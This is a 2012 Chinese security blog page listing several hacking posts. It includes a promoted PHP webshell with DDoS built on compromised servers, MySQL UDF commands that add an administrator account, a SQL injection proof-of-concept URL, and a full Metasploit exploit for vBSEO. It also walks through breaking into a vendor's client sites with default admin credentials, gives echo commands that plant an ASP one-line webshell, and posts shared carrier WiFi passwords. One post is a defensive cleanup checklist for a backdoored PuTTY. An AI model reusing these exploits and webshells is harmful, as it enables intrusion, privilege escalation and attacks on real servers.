影子鹰安全网络-主站技术BLOG

putty和WinSCP后门检查及清理方式

kawen — 2012-2-5 10:06:51

检查及清理方式

　　检查/var/log 是否被删除# /usr/bin/stat /var/log
　　如果被删除了，说明中招了
　　查看/var/log 文件夹内容# ls -al /var/log
　　如果文件很少，说明中招了
　　监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f \| /bin/grep syslog
　　如果有名称为fsyslog或osyslog的进程，说明中招了，注意不要和正常的系统日志进程混淆
　　检查/etc/init.d/sshd 的文件头是否被篡改过# /usr/bin/head /etc/init.d/sshd
　　检查/etc/init.d/sendmail 的文件头是否被篡改过# /usr/bin/head /etc/init.d/sendmail
　　检查是否有对外链接的82 端口# /bin/netstat -anp | /bin/grep ':82'
　　如果有，而你又没设置过，说明已经中招了
　　检查是否有链接到98.126.55.226 的链接# /bin/netstat -anp | /bin/grep '98\.' --color
　　如果有，说明已经中招了
　　检查/etc 文件夹下的隐藏文件.fsyslog .osyslog，检查/lib 文件夹下的隐藏文件.fsyslog .osyslog
　　/usr/bin/find /etc -name '.*' -printf '%a %c %t %M %g:%u %p\n' | /bin/grep 2012 --color
　　/usr/bin/find /lib -name '.*' -printf '%a %c %t %M %g:%u %p\n' | /bin/grep 2012 --color
　　/usr/bin/find /etc -name 'syslog' -printf '%a %c %t %M %g:%u %p\n' | /bin/grep 2012 --color
　　/usr/bin/find /lib -name 'syslog' -printf '%a %c %t %M %g:%u %p\n' | /bin/grep 2012 --color
　　如果有近期修改过的名称包含fsyslog或osyslog的文件，说明已经中招了

恢复系统日志

　　查看系统日志文件夹# ls -al /var/log
　　创建系统日志文件夹# /bin/mkdir /var/log
　　如果被删除的话需要创建
　　查看系统日志服务# /usr/bin/find /etc/init.d/ -name '*log*'
　　需要区分出你的服务器所使用的日志服务
　　关闭系统日志服务# /sbin/service syslog stop
　　你的服务器的日志服务的名称可能是另外一个名字
　　启动系统日志服务# /sbin/service syslog start
　　你的服务器的日志服务的名称可能是另外一个名字
　　创建错误登录日志文件# /bin/touch /var/log/btmp
　　设置错误登录日志文件用户组# /bin/chown root:utmp /var/log/btmp
　　设置错误登录日志文件权限# /bin/chmod 600 /var/log/btmp
　　创建登录日志文件# /bin/touch /var/log/wtmp
　　设置登录日志文件用户组# /bin/chown root:utmp /var/log/wtmp
　　设置登录日志文件权限# /bin/chmod 664 /var/log/wtmp

恢复SELinux（安全增强Linux）设置

　　查看SELinux 状态# /usr/sbin/sestatus -v
　　检查/var/log 文件夹的安全上下文# /sbin/restorecon -rn -vv /var/log
　　恢复/var/log 文件夹的安全上下文# /sbin/restorecon -r -vv /var/log
　　检查/etc 文件夹的安全上下文# /sbin/restorecon -rn -vv /etc 2>/dev/null
　　恢复/etc 文件夹的安全上下文# /sbin/restorecon -r -vv /etc 2>/dev/null
　　检查/lib 文件夹的安全上下文# /sbin/restorecon -rn -vv /lib 2>/dev/null

集管理、压力测试、查询服务器等一体的PHP大马

kawen — 2012-2-3 21:28:31

本软件仅供爱好者研究测试之用！

首先，PHP DDOS 是很久前的技术，现在发出来，综合了PHP 大马的服务器提权测试功能。

集于管理、压力测试、菜刀通用、查询服务器信息等技术于一体。

1 管理就不多说，大家都知道。

2 压力测试，用附带的工具进行测试，最小包1万，最大包65500，可以检测是否存在。

3 菜刀通用，可用菜刀直接进行连接，密码为WEBSHELL登陆密码。  新功能

4 查询服务器信息，查询PR，收录，权重于一体，权重获取数据标准为爱站。

..其他的没什么多说的了，SHELL没有做免杀，原码，大家凑货使，以后自己加密。。

工具使用，添加完SHELL后要导出为config.ini，否则不自动保存的。

最后一点，ASP的WEBSHELL很多支持PHP的，附带一款ASPSHELL 大家可以检测PHP ，支持传入即可。

DDOS功能是以webshell当肉鸡,PHP 很少掉鸡,威力还蛮大，大家自己测试吧。

官方网站  http://www.aspmuma.org/

官方下载地址  http://www.aspmuma.org/Software/Catalog7/74.html

作者EMAIL：liuaqiangbb@163.com

下载

MYSQL提权

kawen — 2012-2-3 9:57:55

1 获得root密码

conn.php config.php

$dbhost = 'localhost';// 数据库服务器

$dbuser = 'root';// 数据库用户名

$dbpw = 'root';// 数据库密码

$dbname = 'discuz';// 数据库名

C:\Winnt\udf.dll    2000

C:\Windows\udf.dll 2003

现在基本上win的服务器就这两个导出UDF.DLL

create function cmdshell returns string soname 'udf.dll'

select cmdshell('net user wjs wjs /add');

select cmdshell('net localgroup administrators wjs /add');

select cmdshell('C:/PHPnow/htdocs/3389.exe');  这个是把开3389的文件放到C盘，然后运行，我们服务器开了3389就不需要执行这步

drop function cmdshell; 删除函数

select cmdshell('netstat -an'); 这是查看端口查开放情况

Snort Report <= 1.3.2 SQL

kawen — 2012-2-1 10:02:21

Snort Report <= 1.3.2 SQL Injection Vulnerability

##########################

Vulnerable parameter:

ipAddress

Vulnerable URL:

http://server/ipdetail.php?type=dst&FQDN=&ipAddress=773116111&beginTime=0&endTime=1324665310

PoC:

http://server/ipdetail.php?type=dst&FQDN=&ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28*%29%2CCONCAT%280x3a79786a3a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a7578713a%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&beginTime=0&endTime=1324665310

##########################

# Patched in v1.3.3

中国移动，中国电信免费公共wifi密码

kawen — 2012-2-1 10:01:06

【中国移动公共wifi的密码】
卡号：15821275836密码：159258
卡号：15800449592密码：159258
卡号：15800449954密码：159258
卡号：15800449940密码：159258

中国电信但凡你的手机能搜到中国电信的chinanet的热点覆盖，全国公免账号07953591377密码3591377 。

说明：
可能有很多人已经知道了，我只是给还不知道的人扫一下盲

可能有些人不知道怎么用，首先就是要你所在的地方能搜到移动或电信的公共wifi信号，目前此信号覆盖的还不是很广。但还是会有人能搜到吧，比如我！搜到之后先用你的设备连接移动的wifi网络，就会跳出网页，要你输入手机号和密码（就是我上面提供的那个），输入后可用的话，就可以上网了。

vBSEO <= 3.6.0 Injection Exploit

kawen — 2012-1-30 10:18:55

vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection Exploit

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})

        super(update_info(info,

            'Name'           => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',

            'Description'    => %q{

                    This module exploits a vulnerability in the 'proc_deutf()' function

                defined in /includes/functions_vbseocp_abstract.php. User input passed through

                'char_repl' POST parameter isn't properly sanitized before being used in a call

                to preg_replace() function which uses the 'e' modifier. This can be exploited to

                inject and execute arbitrary code leveraging the PHP's complex curly syntax.

            },

            'Author'         => 'EgiX ', # originally reported by the vendor

            'License'        => MSF_LICENSE,

            'Version'        => '$Revision$',

            'References'     =>

                [

                    ['BID', '51647'],

                    ['URL', 'http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/'],

                ],

            'Privileged'     => false,

            'Payload'        =>

                {

                    'DisableNops' => true,

                    'Space'       => 8190,

                    'Keys'        => ['php'],

                },

            'Platform'       => ['php'],

            'Arch'           => ARCH_PHP,

            'Targets'        => [[ 'Automatic', { }]],

            'DisclosureDate' => 'Jan 23 2012',

            'DefaultTarget'  => 0))

            register_options(

                [

                    OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),

                ], self.class)

    end

    def check

        flag = rand_text_alpha(rand(10)+10)

        data = "char_repl='{${print(#{flag})}}'=>"

        uri = ''

        uri << datastore['URI']

        uri << '/' if uri[-1,1] != '/'

        uri << 'vbseocp.php'

        response = send_request_cgi({

            'method' => "POST",

            'uri' => uri,

            'data' => "#{data}"

        })

        if response.code == 200 and response.body =~ /#{flag}/

            return Exploit::CheckCode::Vulnerable

        end

        return Exploit::CheckCode::Safe

    end

    def exploit

        if datastore['CMD']

            p = "passthru(\"%s\");" % datastore['CMD']

            p = Rex::Text.encode_base64(p)

        else

            p = Rex::Text.encode_base64(payload.encoded)

        end

        data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"

        uri = ''

        uri << datastore['URI']

        uri << '/' if uri[-1,1] != '/'

        uri << 'vbseocp.php'

        response = send_request_cgi({

            'method' => 'POST',

            'uri' => uri,

            'data' => data,

            'headers' => { 'Code' => p }

        })

        print_status("%s" % response.body) if datastore['CMD']

    end

end

万企互联网站程序通杀oday及修复方案

kawen — 2012-1-19 10:17:04

1、漏洞分析

漏洞存在页面：newsdisp.asp
很明显的注入漏洞！
有些站做了防注！（cookie注入就可以搞定了）
一般的表名为admin 字段名为：username password
有些站表为wq_admin 字段同上
还有个更要命的漏洞（不过也不是什么漏洞）！
这些站基本都用了网络公司给他们的用户名跟密码！
用户名：xywanqi
密码：wanqi#029*（这个密码还得谢谢壞壞不乖兄弟破解）
都不要注入拿用户名跟md5密码了！

2、找后台（比较蛋疼的过程）

我试了几个常用的后台没找到。用阿d，明小子，豹子跑都没有跑出来！
我用谷歌搜 "技术支持：万企互联" 后台管理

谷歌第一个就找到了！
我发现他的后台很特别：
/wq029xxx/login.asp 是这样的格式！
我试了几个站都是这种格局了

后台找到了！

3.拿shell

备份拿站！传个图片格式的小马！图片路径：/photo/20105112139512.jpg

有些站没有备份！
可以抓包上传，后台还有eweb编辑器可以利用！

这个没什么技术含量高手不要见笑！

提供修复方案：

防注入程序需能防cookie注入，及时修改密码，编辑器升级

QQ2011正式版(5064)绿色精简显IP版&纯净版

kawen — 2012-1-16 9:43:55

更新日志：

QQ2011正式版(5064)绿色精简显IP版&纯净版
2012.01.12
更新QQ2011正式版(5064)
更新CWUB2 2012.01.10

QQ2011正式版(5064)绿色精简显IP版&纯净版
2011.12.03
更新QQ2011正式版(3019)
更新CWUB2 2011.12.02

QQ2011正式版(5064)绿色精简显IP版&纯净版
2011.11.23
更新CWUB2 111122
去掉了主面板的等级按钮（仍然可以通过我的资料卡片的等级进入等级页面）
修复了修改某项设置自动退出的问题
修复了不显示天气的问题

QQ2011正式版(5064)绿色精简显IP版&纯净版
2011.11.17
更新QQ2011正式版(2522)
更新CWUB2 111116
修复了上一版远程协助白屏的问题

QQ2011正式版(5064)绿色精简显IP版&纯净版
2011.11.11
更新CWUB2 111111
精简了一些文件

QQ2011正式版(5064)绿色精简显IP版&纯净版

QQ2011正式版(5064)绿色精简显IP版&纯净版
2011.10.28
更新QQ2011正式版(2432)
更新CWUB2
删除了一些无用图片

QQ2011正式版(5064)绿色精简显IP版&纯净版
2011.10.14
修复某些情况下不能通过快捷方式打开的问题
修复其他一些小问题

QQ2011正式版(5064)绿色精简显IP版&纯净版
2011.10.13
更新QQ2011正式版(2425)
更新CWUB2 1.299
显IP版集成本地IP数据库
祝某人生日快乐

QQ2011正式版(5064)绿色精简显IP版&纯净版

QQ2011正式版(5064)绿色精简显IP版&纯净版
如果有任何问题请先看FAQ

QQ2011正式版(5064)绿色精简显IP版&纯净版
恢复包中包含QQ音乐正在收听、快速登录、临时会话、迷你首页、通讯录以及所有组件的恢复

QQ2011正式版(5064)绿色精简显IP版&纯净版
下载地址：

QQ2011正式版(5064)绿色精简显IP版&纯净版
QQ2011正式版(5064)：
显IP版：
http://file.jayxon.com/~jayxon/QQ2011JayXon.7z
http://115.com/file/dno8gmm3
纯净版：
http://115.com/file/cl01fchl
恢复包：
http://file.jayxon.com/~jayxon/QQ2011Files.7z
http://115.com/file/aq5odts9

龙年大吉网站不定时更新

kawen — 2012-1-11 9:46:17

龙年大吉。祝全天下的人都能新年心想事成。呵呵。网站进入不定时更新阶段！

SA权限ECHO写一句话

kawen — 2012-1-11 9:41:07

注入点是SA权限.
xp_cmdshell是存在的.
找到网站主目录 dir d:\wwwroot
找到站点的目录后.
Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\ok.asp
echo ^<%eval request("#")%^> >d:\wwwroot\xx\ok.asp
echo "<%eval request("#")%>" >d:\wwwroot\xx\ok.asp